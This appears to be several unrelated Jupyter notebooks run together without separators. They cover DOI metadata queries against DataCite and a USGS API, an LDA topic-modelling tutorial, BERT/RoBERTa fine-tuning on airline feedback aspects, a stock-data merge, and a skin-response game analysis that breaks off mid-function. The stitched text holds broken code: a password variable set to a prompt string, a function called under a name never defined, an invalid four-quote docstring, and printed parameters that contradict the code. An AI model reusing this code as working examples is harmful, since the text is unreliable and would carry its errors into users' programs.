requests.get('https://api.datacite.org/dois?query=10.5066/p9vrv6us') datacite_json = json.loads(datacite_query.text) datacite_json['data'][0] x = datacite_json['data'][0] x.keys() x = datacite_json['data'][0]['attributes'] for key in x: print (key)doi identifiers creators titles publisher container publicationYear subjects contributors dates language types relatedIdentifiers sizes formats version rightsList descriptions geoLocations fundingReferences url contentUrl metadataVersion schemaVersion source isActive state reason created registered published updatedUSGS Data Tools DOI APIimport getpass from usgs_datatools import doi #DoiSession = doi.DoiSession(env='production') # Production #DoiSession = doi.DoiSession(env='staging') # Staging #*Note: User must be on the USGS network or VPN to successfully use the staging environment.* DoiSession = doi.DoiSession(env='production') username = 'dignizio' password = ('USGS AD Password: ') print('*Complete*') DoiSession.doi_authenticate(username, password) print ("Successfully authenticated.") # Note the raw URL being accessed under the hood with the function. # This is worth noting when comparing to the documentation for REST endpoint. # ('https://www1.usgs.gov/csas/dmapi/doi/doi:10.5066/P9VRV6US') # Endpoint appears to Caps sensitive. Uses 'doi' + colon. usgs_doi = DoiSession.get_doi('doi:10.5066/F7W0944J') usgs_doi for field in usgs_doi.keys(): print (field)doi title pubDate url resourceType date dateType description subject username status noDataReleaseAvailableReason noPublicationIdAvailable dataSourceId dataSourceName linkCheckingStatus formatTypes authors users relatedIdentifiers ipdsNumbers created modifiedLDA TutorialTaken from https://www.machinelearningplus.com/nlp/topic-modeling-python-sklearn-examples/import numpy as np import pandas as pd import re, nltk, spacy, gensim from sklearn.decomposition import LatentDirichletAllocation,TruncatedSVD from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer from sklearn.model_selection import GridSearchCV from pprint import pprint import pyLDAvis import pyLDAvis.sklearn import matplotlib.pyplot as plt %matplotlib inline # Import Dataset 20-Newsgroups Dataset df = pd.read_json('https://raw.githubusercontent.com/selva86/datasets/master/newsgroups.json') print(df.target_names.unique()) df.head() ##remove emails and new line characters data = df.content.values.tolist() # Remove Emails data = [re.sub('[\w.-]+@[\w.-]+.\w+', '', sent) for sent in data] # Remove new line characters data = [re.sub('\n+', ' ', sent) for sent in data] # Remove distracting single quotes data = [re.sub("\'", "", sent) for sent in data] pprint(data[:1]) ## deacc remove punctuations def sen_to_word(sentences): for sentence in sentences: yield(gensim.utils.simple_preprocess(str(sentence), deacc=True)) data_words = list(sen_to_word(data)) print(data_words[:1]) def lemmatization(texts, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']): """https://spacy.io/api/annotation""" texts_out = [] for sent in texts: doc = nlp(" ".join(sent)) texts_out.append(" ".join([token.lemma_ if token.lemma_ not in ['-PRON-'] else '' for token in doc if token.pos_ in allowed_postags])) return texts_out # Initialize spacy 'en' model, keeping only tagger component (for efficiency) # Run in terminal: python3 -m spacy download en nlp = spacy.load('en', disable=['parser', 'ner']) # Do lemmatization keeping only Noun, Adj, Verb, Adverb data_lemmatized = lemmatization(data_words, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']) print(data_lemmatized[:2]) vectorizer = CountVectorizer(analyzer='word', min_df=10, # minimum reqd occurences of a word stop_words='english', # remove stop words lowercase=True, # convert all words to lowercase token_pattern='[a-zA-Z0-9]{3,}', # num chars > 3 # max_features=50000, # max number of uniq words ) data_vectorized = vectorizer.fit_transform(data_lemmatized) # Materialize the sparse data data_dense = data_vectorized.todense() # Compute Sparsicity = Percentage of Non-Zero cells print("Sparsicity: ", ((data_dense > 0).sum()/data_dense.size)*100, "%") # Build LDA Model lda_model = LatentDirichletAllocation(n_components=20, # Number of components max_iter=10, # Max learning iterations learning_method='batch', random_state=100, # Random state batch_size=128, # n docs in each learning iter evaluate_every = -1, # compute perplexity every n iters, default: Don't n_jobs = -1, # Use all available CPUs ) lda_output = lda_model.fit_transform(data_vectorized) print(lda_model) # Model attributes # Log Likelyhood: Higher the better print("Log Likelihood: ", lda_model.score(data_vectorized)) # Perplexity: Lower the better. Perplexity = exp(-1. * log-likelihood per word) print("Perplexity: ", lda_model.perplexity(data_vectorized)) # See model parameters pprint(lda_model.get_params())Log Likelihood: -9966052.223646708 Perplexity: 2040.6879775616724 {'batch_size': 128, 'doc_topic_prior': None, 'evaluate_every': -1, 'learning_decay': 0.7, 'learning_method': 'online', 'learning_offset': 10.0, 'max_doc_update_iter': 100, 'max_iter': 10, 'mean_change_tol': 0.001, 'n_components': 20, 'n_jobs': -1, 'n_topics': None, 'perp_tol': 0.1, 'random_state': 100, 'topic_word_prior': None, 'total_samples': 1000000.0, 'verbose': 0}Grid Search to Optimize ParametersThe most important tuning parameter for LDA models is n_components (number of topics).Besides these, other possible search params could be learning_offset (downweigh early iterations. Should be > 1) and max_iter.# Define Search Param #search_params = {'n_components': [10, 15, 20, 25, 30], 'learning_decay': [.5, .7, .9], 'max_iter': [5, 10, 15]} search_params = {'n_components': [10, 15, 20], 'learning_decay': [.7, .9]} # Init the Model lda = LatentDirichletAllocation() # Init Grid Search Class model = GridSearchCV(lda, param_grid=search_params) # Do the Grid Search model.fit(data_vectorized) # Best Model best_lda_model = model.best_estimator_ # Model Parameters print("Best Model's Params: ", model.best_params_) # Log Likelihood Score print("Best Log Likelihood Score: ", model.best_score_) # Perplexity print("Model Perplexity: ", best_lda_model.perplexity(data_vectorized)) # Get Log Likelyhoods from Grid Search Output n_topics = [10, 15, 20] log_likelyhoods_5 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.5] log_likelyhoods_7 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.7] log_likelyhoods_9 = [round(gscore.mean_validation_score) for gscore in model.grid_scores_ if gscore.parameters['learning_decay']==0.9] # Show graph plt.figure(figsize=(12, 8)) plt.plot(n_topics, log_likelyhoods_5, label='0.5') plt.plot(n_topics, log_likelyhoods_7, label='0.7') plt.plot(n_topics, log_likelyhoods_9, label='0.9') plt.title("Choosing Optimal LDA Model") plt.xlabel("Num Topics") plt.ylabel("Log Likelyhood Scores") plt.legend(title='Learning decay', loc='best') plt.show() # Create Document - Topic Matrix lda_output = best_lda_model.transform(data_vectorized) # column names topicnames = ["Topic" + str(i) for i in range(best_lda_model.n_topics)] # index names docnames = ["Doc" + str(i) for i in range(len(data))] # Make the pandas dataframe df_document_topic = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames) # Get dominant topic for each document dominant_topic = np.argmax(df_document_topic.values, axis=1) df_document_topic['dominant_topic'] = dominant_topic # Styling def color_green(val): color = 'green' if val > .1 else 'black' return 'color: {col}'.format(col=color) def make_bold(val): weight = 700 if val > .1 else 400 return 'font-weight: {weight}'.format(weight=weight) # Apply Style df_document_topics = df_document_topic.head(15).style.applymap(color_green).applymap(make_bold) df_document_topics df_topic_distribution = df_document_topic['dominant_topic'].value_counts().reset_index(name="Num Documents") df_topic_distribution.columns = ['Topic Num', 'Num Documents'] df_topic_distribution pyLDAvis.enable_notebook() panel = pyLDAvis.sklearn.prepare(best_lda_model, data_vectorized, vectorizer, mds='tsne') panel # Topic-Keyword Matrix df_topic_keywords = pd.DataFrame(best_lda_model.components_) # Assign Column and Index df_topic_keywords.columns = vectorizer.get_feature_names() df_topic_keywords.index = topicnames # View df_topic_keywords.head() # Show top n keywords for each topic def show_topics(vectorizer=vectorizer, lda_model=lda_model, n_words=20): keywords = np.array(vectorizer.get_feature_names()) topic_keywords = [] for topic_weights in lda_model.components_: top_keyword_locs = (-topic_weights).argsort()[:n_words] topic_keywords.append(keywords.take(top_keyword_locs)) return topic_keywords topic_keywords = show_topics(vectorizer=vectorizer, lda_model=best_lda_model, n_words=15) # Topic - Keywords Dataframe df_topic_keywords = pd.DataFrame(topic_keywords) df_topic_keywords.columns = ['Word '+str(i) for i in range(df_topic_keywords.shape[1])] df_topic_keywords.index = ['Topic '+str(i) for i in range(df_topic_keywords.shape[0])] df_topic_keywords # Define function to predict topic for a given text document. nlp = spacy.load('en', disable=['parser', 'ner']) def predict_topic(text, nlp=nlp): global sent_to_words global lemmatization # Step 1: Clean with simple_preprocess mytext_2 = list(sent_to_words(text)) # Step 2: Lemmatize mytext_3 = lemmatization(mytext_2, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']) # Step 3: Vectorize transform mytext_4 = vectorizer.transform(mytext_3) # Step 4: LDA Transform topic_probability_scores = best_lda_model.transform(mytext_4) topic = df_topic_keywords.iloc[np.argmax(topic_probability_scores), :].values.tolist() return topic, topic_probability_scores # Predict the topic mytext = ["Some text about christianity and bible"] topic, prob_scores = predict_topic(text = mytext) print(topic) # Construct the k-means clusters from sklearn.cluster import KMeans clusters = KMeans(n_clusters=15, random_state=100).fit_predict(lda_output) # Build the Singular Value Decomposition(SVD) model svd_model = TruncatedSVD(n_components=2) # 2 components lda_output_svd = svd_model.fit_transform(lda_output) # X and Y axes of the plot using SVD decomposition x = lda_output_svd[:, 0] y = lda_output_svd[:, 1] # Weights for the 15 columns of lda_output, for each component print("Component's weights: \n", np.round(svd_model.components_, 2)) # Percentage of total information in 'lda_output' explained by the two components print("Perc of Variance Explained: \n", np.round(svd_model.explained_variance_ratio_, 2)) # Plot plt.figure(figsize=(12, 12)) plt.scatter(x, y, c=clusters) plt.xlabel('Component 2') plt.xlabel('Component 1') plt.title("Segregation of Topic Clusters", ) from sklearn.metrics.pairwise import euclidean_distances nlp = spacy.load('en', disable=['parser', 'ner']) def similar_documents(text, doc_topic_probs, documents = data, nlp=nlp, top_n=5, verbose=False): topic, x = predict_topic(text) dists = euclidean_distances(x.reshape(1, -1), doc_topic_probs)[0] doc_ids = np.argsort(dists)[:top_n] if verbose: print("Topic KeyWords: ", topic) print("Topic Prob Scores of text: ", np.round(x, 1)) print("Most Similar Doc's Probs: ", np.round(doc_topic_probs[doc_ids], 1)) return doc_ids, np.take(documents, doc_ids) # Get similar documents mytext = ["Some text about christianity and bible"] doc_ids, docs = similar_documents(text=mytext, doc_topic_probs=lda_output, documents = data, top_n=1, verbose=True) print('\n', docs[0][:500])Mechanics of TensorFlow ```{admonition} AttributionThis notebook follows Chapter 14: *Going Deeper – The Mechanics of TensorFlow* of {cite}`RaschkaMirjalili2019`.```import tensorflow as tf print(tf.__version__) print(tf.config.list_physical_devices('GPU'))2.7.0 [PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')]Fine-tune BERT & RoBERTa for Aspect Category Detection in PyTorch Using Hugging Face The code was adopted and modified for this task from the work of [](https://github.com/gmihaila). Source code: https://gmihaila.medium.com/fine-tune-transformers-in-pytorch-using-transformers-57b40450635 InfoThis notebook is designed to use a pretrained BERT or RoBERTa model and fine-tune it on an Aspect Category Detection task. All the instructions on the setups used can be found on "*Chapter 4: Classification Method* " of the thesis report.This notebook is using the [AutoClasses](https://huggingface.co/transformers/model_doc/auto.html) from [transformer](https://github.com/huggingface/transformers) by [Hugging Face](https://huggingface.co/) functionality. This functionality can guess a model's configuration, tokenizer and architecture just by passing in the model's name. This allows us to reuse the code on a large number of transformers models. How to use this notebook? This notebook was built with reusability in mind. The way I load the dataset into the PyTorch class is pretty standard and can be easily reused for any other dataset.The only modifications needed to use your own dataset will be in reading in the dataset inside the PyTorch **Dataset** class under **Dataset and DataLoader** tab. The **DataLoader** will return a dictionary of batch inputs format so that it can be fed straight to the model using the statement: `outputs = model(**batch)`. *As long as this statement holds, the rest of the code will work.*Basic parameters are defined under the **Imports** tab:* `epochs` - will be used as the number of epochs to train the model. * `batch_size` - will be used as the batch size during training. The larger the batch the more RAM / GPU memory it will take. * `max_length` - I use this variable if I want to truncate text inputs to a shorter length than the maximum allowed word piece tokens sequence length. The shorter the sequence the faster it will train.* `model_name_or_path` - This is where I put the transformer model I want to train. In this work, I used `bert-base-uncased` and `roberta-base`.* `labels_ids` - It is mostly the case that labels have a name / meaning. We need to associate each name / meaning with a number / id. I use this variable to create a dictionary that maps labels names to ids. This will be used later inside the PyTorch Dataset class. DatasetThis notebook will cover the fine-tuning of BERT & RoBERTa for Aspect Based Sentiment Analysis. The Dataset used for this finetuning step is the in-house annotated airline customer feedbacks set. For this notebook, only the Aspect Category will be considered. ImportsImport all needed libraries for this notebook.import torch from tqdm.notebook import tqdm from torch.utils.data import Dataset, DataLoader from utils import plot_dict, plot_confusion_matrix from sklearn.metrics import classification_report, accuracy_score from transformers import (AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, AdamW, get_linear_schedule_with_warmup, set_seed, ) import pandas as pd from datetime import datetimeDeclare parameters used for this notebook:# Set seed for reproducibility, set_seed(123) # Number of training epochs epochs = 4 # Number of batch_size - depending on the max sequence length and GPU memory. batch_size = 64 #32 (using 64 returns 32 batch size) # Padd or truncate text sequences to a specific length # if `None` it will use maximum sequence allowed by model. max_length = 124 # Look for gpu to use. Will use `cpu` by default if no gpu found. device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # Name of transformers model - will use already pretrained model. # Path of transformer model - will load your own model from local disk. model_name_or_path = 'roberta-base' # For this work I used 'roberta-base' and 'bert-base-uncased' # Dicitonary of labels and their id - this will be used to convert. # String labels to number. labels_ids = { 'Service' : 0, 'Company' : 1, 'Staff' : 2, 'Price' : 3, 'Travel' : 4, 'Aircraft equipment' : 5, 'Food' : 6, 'Safety' : 7, 'Boarding' : 8, 'Luggage' : 9,'Information' : 10, 'Others' : 11, 'Multiple' : 12, 'NA' : 13 } # How many labels are we using in training. # This is used to decide size of classification head. n_labels = len(labels_ids)Helper FunctionsAll Classes and functions that will be used in this notebook are kept under this section to help maintain a clean look of the notebook:* AirlineFeedbackDataset* train* validationclass AirlineFeedbackDataset(Dataset): r"""PyTorch Dataset class for loading data. This is where the data parsing happens and where the text gets encoded using loaded tokenizer. This class is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: path (:obj:`str`): Path to the data partition. use_tokenizer (:obj:`transformers.tokenization_?`): Transformer type tokenizer used to process raw text into numbers. labels_ids (:obj:`dict`): Dictionary to encode any labels names into numbers. Keys map to labels names and Values map to number associated to those labels. max_sequence_len (:obj:`int`, `optional`) Value to indicate the maximum desired sequence to truncate or pad text sequences. If no value is passed it will used maximum sequence size supported by the tokenizer and model. """ def __init__(self, path, use_tokenizer, labels_ids, max_sequence_len=None): # Read in the data df_train = pd.read_csv(path, delimiter=';', header= 0, dtype= str, keep_default_na=False, encoding= 'utf-8') df_train = df_train.dropna() # Check max sequence length. max_sequence_len = 64 # use_tokenizer.max_len if max_sequence_len is None else max_sequence_len texts = [] labels = [] print('Reading partitions...') # Since the labels are defined by folders with data we loop # through each label. [labels.append(labels_ids[label]) for label in df_train['Aspect_Category'].astype(str)] [texts.append(sentence) for sentence in df_train['Sentence'].astype(str)] # Number of exmaples. self.n_examples = len(labels) # Use tokenizer on texts. This can take a while. print('Using tokenizer on all texts. This can take a while...') self.inputs = use_tokenizer(texts, add_special_tokens=True, truncation=True, padding=True, return_tensors='pt', max_length=max_sequence_len) # Get maximum sequence length. self.sequence_len = self.inputs['input_ids'].shape[-1] print('Texts padded or truncated to %d length!' % self.sequence_len) # Add labels. self.inputs.update({'labels':torch.tensor(labels)}) print('Finished!\n') return def __len__(self): r"""When used `len` return the number of examples. """ return self.n_examples def __getitem__(self, item): r"""Given an index return an example from the position. Arguments: item (:obj:`int`): Index position to pick an example to return. Returns: :obj:`Dict[str, object]`: Dictionary of inputs that feed into the model. It holddes the statement `model(**Returned Dictionary)`. """ return {key: self.inputs[key][item] for key in self.inputs.keys()} def train(dataloader, optimizer_, scheduler_, device_): r""" Train pytorch model on a single pass through the data loader. It will use the global variable `model` which is the transformer model loaded on `_device` that we want to train on. This function is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: dataloader (:obj:`torch.utils.data.dataloader.DataLoader`): Parsed data into batches of tensors. optimizer_ (:obj:`transformers.optimization.AdamW`): Optimizer used for training. scheduler_ (:obj:`torch.optim.lr_scheduler.LambdaLR`): PyTorch scheduler. device_ (:obj:`torch.device`): Device used to load tensors before feeding to model. Returns: :obj:`List[List[int], List[int], float]`: List of [True Labels, Predicted Labels, Train Average Loss]. """ # Use global variable for model. global model # Tracking variables. predictions_labels = [] true_labels = [] # Total loss for this epoch. total_loss = 0 # Put the model into training mode. model.train() # For each batch of training data... for batch in tqdm(dataloader, total=len(dataloader)): # Add original labels - use later for evaluation. true_labels += batch['labels'].numpy().flatten().tolist() # move batch to device batch = {k:v.type(torch.long).to(device_) for k,v in batch.items()} # Always clear any previously calculated gradients before performing a # backward pass. model.zero_grad() # Perform a forward pass (evaluate the model on this training batch). # This will return the loss (rather than the model output) because we # have provided the `labels`. # The documentation for this a bert model function is here: # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification outputs = model(**batch) # The call to `model` always returns a tuple, so we need to pull the # loss value out of the tuple along with the logits. We will use logits # later to calculate training accuracy. loss, logits = outputs[:2] # Accumulate the training loss over all of the batches so that we can # calculate the average loss at the end. `loss` is a Tensor containing a # single value; the `.item()` function just returns the Python value # from the tensor. total_loss += loss.item() # Perform a backward pass to calculate the gradients. loss.backward() # Clip the norm of the gradients to 1.0. # This is to help prevent the "exploding gradients" problem. torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) # Update parameters and take a step using the computed gradient. # The optimizer dictates the "update rule"--how the parameters are # modified based on their gradients, the learning rate, etc. optimizer.step() # Update the learning rate. scheduler.step() # Move logits and labels to CPU logits = logits.detach().cpu().numpy() # Convert these logits to list of predicted labels values. predictions_labels += logits.argmax(axis=-1).flatten().tolist() # Calculate the average loss over the training data. avg_epoch_loss = total_loss / len(dataloader) # Return all true labels and prediction for future evaluations. return true_labels, predictions_labels, avg_epoch_loss def validation(dataloader, device_): r"""Validation function to evaluate model performance on a separate set of data. This function will return the true and predicted labels so we can use later to evaluate the model's performance. This function is built with reusability in mind: it can be used as is as long as the `dataloader` outputs a batch in dictionary format that can be passed straight into the model - `model(**batch)`. Arguments: dataloader (:obj:`torch.utils.data.dataloader.DataLoader`): Parsed data into batches of tensors. device_ (:obj:`torch.device`): Device used to load tensors before feeding to model. Returns: :obj:`List[List[int], List[int], float]`: List of [True Labels, Predicted Labels, Train Average Loss] """ # Use global variable for model. global model # Tracking variables predictions_labels = [] true_labels = [] #total loss for this epoch. total_loss = 0 # Put the model in evaluation mode--the dropout layers behave differently # during evaluation. model.eval() # Evaluate data for one epoch for batch in tqdm(dataloader, total=len(dataloader)): # add original labels true_labels += batch['labels'].numpy().flatten().tolist() # move batch to device batch = {k:v.type(torch.long).to(device_) for k,v in batch.items()} # Telling the model not to compute or store gradients, saving memory and # speeding up validation with torch.no_grad(): # Forward pass, calculate logit predictions. # This will return the logits rather than the loss because we have # not provided labels. # token_type_ids is the same as the "segment ids", which # differentiates sentence 1 and 2 in 2-sentence tasks. # The documentation for this `model` function is here: # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification outputs = model(**batch) # The call to `model` always returns a tuple, so we need to pull the # loss value out of the tuple along with the logits. We will use logits # later to to calculate training accuracy. loss, logits = outputs[:2] # Move logits and labels to CPU logits = logits.detach().cpu().numpy() # Accumulate the training loss over all of the batches so that we can # calculate the average loss at the end. `loss` is a Tensor containing a # single value; the `.item()` function just returns the Python value # from the tensor. total_loss += loss.item() # get predicitons to list predict_content = logits.argmax(axis=-1).flatten().tolist() # update list predictions_labels += predict_content # Calculate the average loss over the training data. avg_epoch_loss = total_loss / len(dataloader) # Return all true labels and prediciton for future evaluations. return true_labels, predictions_labels, avg_epoch_lossLoad Model and TokenizerLoding the three esential parts of pretrained transformers: configuration, tokenizer and model. We also need to load model to the device we're planning to use (GPU / CPU).# Get model configuration. print('Loading configuration...') model_config = AutoConfig.from_pretrained(pretrained_model_name_or_path=model_name_or_path, num_labels=n_labels) # Get model's tokenizer. print('Loading tokenizer...') tokenizer = AutoTokenizer.from_pretrained(pretrained_model_name_or_path=model_name_or_path) # Get the actual model. print('Loading model...') model = AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path=model_name_or_path, config=model_config) # Load model to defined device. model.to(device) print('Model loaded to `%s`'%device)Loading configuration... Loading tokenizer... Loading model... Some weights of the model checkpoint at roberta-base were not used when initializing RobertaForSequenceClassification: ['lm_head.bias', 'lm_head.dense.weight', 'lm_head.dense.bias', 'lm_head.layer_norm.weight', 'lm_head.layer_norm.bias', 'lm_head.decoder.weight', 'roberta.pooler.dense.weight', 'roberta.pooler.dense.bias'] - This IS expected if you are initializing RobertaForSequenceClassification from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model). - This IS NOT expected if you are initializing RobertaForSequenceClassification from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model). Some weights of RobertaForSequenceClassification were not initialized from the model checkpoint at roberta-base an[...]Dataset and DataLoaderCreate the PyTorch Dataset and DataLoader objects that will be used to feed data into our model.print('Dealing with Train...') # Create pytorch dataset. train_dataset = AirlineFeedbackDataset(path="path/to/train.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `train_dataset` with %d examples!'%len(train_dataset)) # Move pytorch dataset into dataloader. train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True) print('Created `train_dataloader` with %d batches!'%len(train_dataloader)) print() print('Dealing with ...') # Create pytorch dataset. valid_dataset = AirlineFeedbackDataset(path="path/to/valid.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `valid_dataset` with %d examples!'%len(valid_dataset)) # Move pytorch dataset into dataloader. valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False) print('Created `eval_dataloader` with %d batches!'%len(valid_dataloader))Dealing with Train... Reading partitions... Using tokenizer on all texts. This can take a while... Texts padded or truncated to 64 length! Finished! Created `train_dataset` with 1996 examples! Created `train_dataloader` with 32 batches! Dealing with ... Reading partitions... Using tokenizer on all texts. This can take a while... Texts padded or truncated to 64 length! Finished! Created `valid_dataset` with 250 examples! Created `eval_dataloader` with 4 batches!TrainCreate optimizer and scheduler use by PyTorch in training.Loop through the number of defined epochs and call the **train** and **validation** functions.Outputs similar info after each epoch as in Keras: *train_loss: - val_loss: - train_acc: - valid_acc*.After training, plot train and validation loss and accuracy curves to check how the training went.start_time = datetime.now() # Note: AdamW is a class from the huggingface library (as opposed to pytorch) optimizer = AdamW(model.parameters(), lr = 3e-5, # args.learning_rate eps = 1e-8 # args.adam_epsilon ) # Total number of training steps is number of batches * number of epochs. # `train_dataloader` contains batched data so `len(train_dataloader)` gives # us the number of batches. total_steps = len(train_dataloader) * epochs # Create the learning rate scheduler. scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps = 0, # Default value in run_glue.py num_training_steps = total_steps) # Store the average loss after each epoch so we can plot them. all_loss = {'train_loss':[], 'val_loss':[]} all_acc = {'train_acc':[], 'val_acc':[]} # Loop through each epoch. print('Epoch') for epoch in tqdm(range(epochs)): print() print('Training on batches...') # Perform one full pass over the training set. train_labels, train_predict, train_loss = train(train_dataloader, optimizer, scheduler, device) train_acc = accuracy_score(train_labels, train_predict) # Get prediction form model on validation data. print('Validation on batches...') valid_labels, valid_predict, val_loss = validation(valid_dataloader, device) val_acc = accuracy_score(valid_labels, valid_predict) # Print loss and accuracy values to see how training evolves. print(" train_loss: %.5f - val_loss: %.5f - train_acc: %.5f - valid_acc: %.5f"%(train_loss, val_loss, train_acc, val_acc)) print() # Store the loss value for plotting the learning curve. all_loss['train_loss'].append(train_loss) all_loss['val_loss'].append(val_loss) all_acc['train_acc'].append(train_acc) all_acc['val_acc'].append(val_acc) end_time = datetime.now() print('Duration: {}'.format(end_time - start_time)) # Plot loss curves. plot_dict(all_loss, use_xlabel='Epochs', use_ylabel='Value', use_linestyles=['-', '--']) # Plot accuracy curves. plot_dict(all_acc, use_xlabel='Epochs', use_ylabel='Value', use_linestyles=['-', '--'])EpochEvaluateWhen dealing with classification is useful to look at precision recall and F1 score.A good gauge to have when evaluating a model is the confusion matrix.# SAVE MODELS TO THE MODELS FOLDER WITH TORCH torch.save(tokenizer, "models/r_aspect_tokenizer_3e") torch.save(model, "models/r_aspect_model_3e") torch.save(device, "models/r_aspect_device_3e") # # some time later... # # load the model from disk # tokenizer = torch.load("models/r_aspect_tokenizer_3e") # model = torch.load("models/r_aspect_model_3e") # device = torch.load("models/r_aspect_device_3e") # Evaluation on test data. # Create pytorch dataset. test_dataset = AirlineFeedbackDataset(path="path/to/test.csv", use_tokenizer=tokenizer, labels_ids=labels_ids, max_sequence_len=max_length) print('Created `test_dataset` with %d examples!'%len(test_dataset)) # Move pytorch dataset into dataloader. test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False) print('Created `test_dataloader` with %d batches!'%len(test_dataloader)) true_labels, predictions_labels, avg_epoch_loss = validation(test_dataloader, device) # Create the evaluation report. evaluation_report = classification_report(true_labels, predictions_labels, labels=list(labels_ids.values()), target_names=list(labels_ids.keys())) # Show the evaluation report. print(evaluation_report) # Plot confusion matrix. plot_confusion_matrix(y_true=true_labels, y_pred=predictions_labels, classes=list(labels_ids.keys()), normalize=False, width= 2, height= 2, magnify=3, ); # Check examples of classification comparing gold label and prediction # the output is hidden because it shows private data test_df = pd.read_csv("path/to/test.csv", delimiter=';', header= 0, dtype= str, keep_default_na=False, encoding= 'utf-8') sentences = test_df['Sentence'] def get_key(val): """" function to return the key for any value in a dictionary """" for key, value in labels_ids.items(): if val == value: return key return "key doesn't exist" i = 1 for s, gold, pred in zip(sentences, true_labels, predictions_labels): print('SENTENCE', i, ': ', s) print('GOLD : ', get_key(gold), ' PREDICTION -->', get_key(pred)) i += 1 print() print()Import and Mergeimport matplotlib.pyplot as plt import pandas as pd import numpy as np import pathlib # read csv file fundamentals = pd.read_csv('../data/fundamentals.csv') # group by ticker fundamentals_group = fundamentals.groupby ('Ticker Symbol') fundamentals_group.head() # drop columns we don't need fundamentals_clean = fundamentals.set_index('Ticker Symbol').loc[ : , ['Period Ending', 'Net Income','Profit Margin' ,'Quick Ratio' ,'Total Assets', 'Total Liabilities', 'Earnings Per Share', 'Estimated Shares Outstanding','Total Current Assets', 'Total Current Liabilities' ] ] def clean_date(date): if len(date) > 10: clean_date= date[:10] else: clean_date= date return clean_date assert clean_date('2016-12-30 00:00:00') == '2016-12-30' assert clean_date('2016-11-06 00:00:00') == '2016-11-06' assert clean_date( '2016-12-30')=='2016-12-30' fundamentals_clean['Period Ending'] = fundamentals_clean['Period Ending'].apply(clean_date) final_fund =fundamentals_clean.loc[(fundamentals_clean['Period Ending'] == '2015-12-31') ] final_fund # read prices csv prices= pd.read_csv('../data/prices.csv') prices.head() # drop columns we don't need prices_index =prices.set_index('symbol').loc[ : , ['date', 'close'] ] prices_index['date'] = prices_index['date'].apply(clean_date) final_prices = prices_index.loc[(prices_index['date'] == '2015-12-30') ] final_prices.index.name = 'Ticker Symbol' final_prices_renamed = final_prices.rename(columns={"close": "Closing Price"}) # merge 2 datasets in order to have the stock price added to the needed info for stock analyzing Final_data_df =pd.merge( left = final_fund , right= final_prices_renamed['Closing Price'] , how="inner", left_index= True , right_index = True ) Final_data_df pwd # export data into csv Final_data_df.to_csv("../data/stocks_closing_info_2015.csv")Statistical analysisdef extract_split_data(data): content = re.findall("\[(.*?)\]", data) values = [] for c in content[0].split(","): c = (c.strip()[1:-1]) if len(c)>21: x, y = c.split("#") values.append(int(x)) return values def gsr_analysis(span, plotting = True): sessionCount = 0 veryBeginning = [] nearEnd = [] duringGame = [] size = span//2 + 1 # half for url in glob.glob("/Users/xueguoliang/Desktop/Data_v2/*.csv"): player = pd.read_csv(url, delimiter=";") for session in player['GSR']: rate = extract_split_data(session) if len(rate)>span: sessionCount += 1 veryBeginning.append(rate[0:span]) nearEnd.append(rate[-1-span:-1]) if len(rate)%2 == 0: duringGame.append(rate[len(rate)//2-size+1:len(rate)//2+size-1]) else: duringGame.append(rate[len(rate)//2-size+1:len(rate)//2+size-1]) print("We have collected {} games.".format(sessionCount)) print("The size of GSR sample is {}.".format(span)) if(plotting): #plot fig, ax = plt.subplots(3, 2, figsize=(15,15)) labels = ["Postive", "Negative"] ########################################## Begin ################################################## std_begin = [] slope_begin = [] for item in veryBeginning: slope_begin.append((item[-1]-item[0])/(len(item)-1)) std_begin.append(round(np.std(item), 2)) begin_pos = sum([1 for x in slope_begin if x > 0]) begin_nag = sum([1 for x in slope_begin if x < 0]) dict_begin = {1:begin_pos, 2:begin_nag} ax[0][0].set_title("Distribution of STD for Beginning of game") ax[0][0].hist(std_begin, bins=50, range=(min(std_begin), max(std_begin))) #ax[0][0].set_xlim([0,10]) #ax[0][0].set_ylim([0,400]) ax[0][1].set_title("Distribution of Slope(+,-) for Beginning of game") ax[0][1].bar(range(len(dict_begin)), dict_begin.values(), color='g') ax[0][1].set_xticklabels(("","","Positive","","","", "Negative")) ########################################## During ################################################# std_during = [] slope_during = [] for item in duringGame: slope_during.append((item[-1]-item[0])/(len(item)-1)) std_during.append(round(np.std(item), 2)) during_pos = sum([1 for x in slope_during if x > 0]) during_nag = sum([1 for x in slope_during if x < 0]) dict_during = {1:during_pos, 2:during_nag} ax[1][0].set_title("Distribution of STD for During of game") ax[1][0].hist(std_during, bins=50, range=(min(std_during), max(std_during))) #ax[1][0].set_xlim([0,300]) ax[1][1].set_title("Distribution of Slope(+,-) for During of game") ax[1][1].bar(list(dict_during.keys()), dict_during.values(), color='g') ax[1][1].set_xticklabels(("","","Positive","","","", "Negative")) ########################################## End ################################################### std_end = [] slope_end = [] for item in nearEnd: slope_end.append((item[-1]-item[0])/(len(item)-1)) std_end.append(round(np.std(item), 2)) 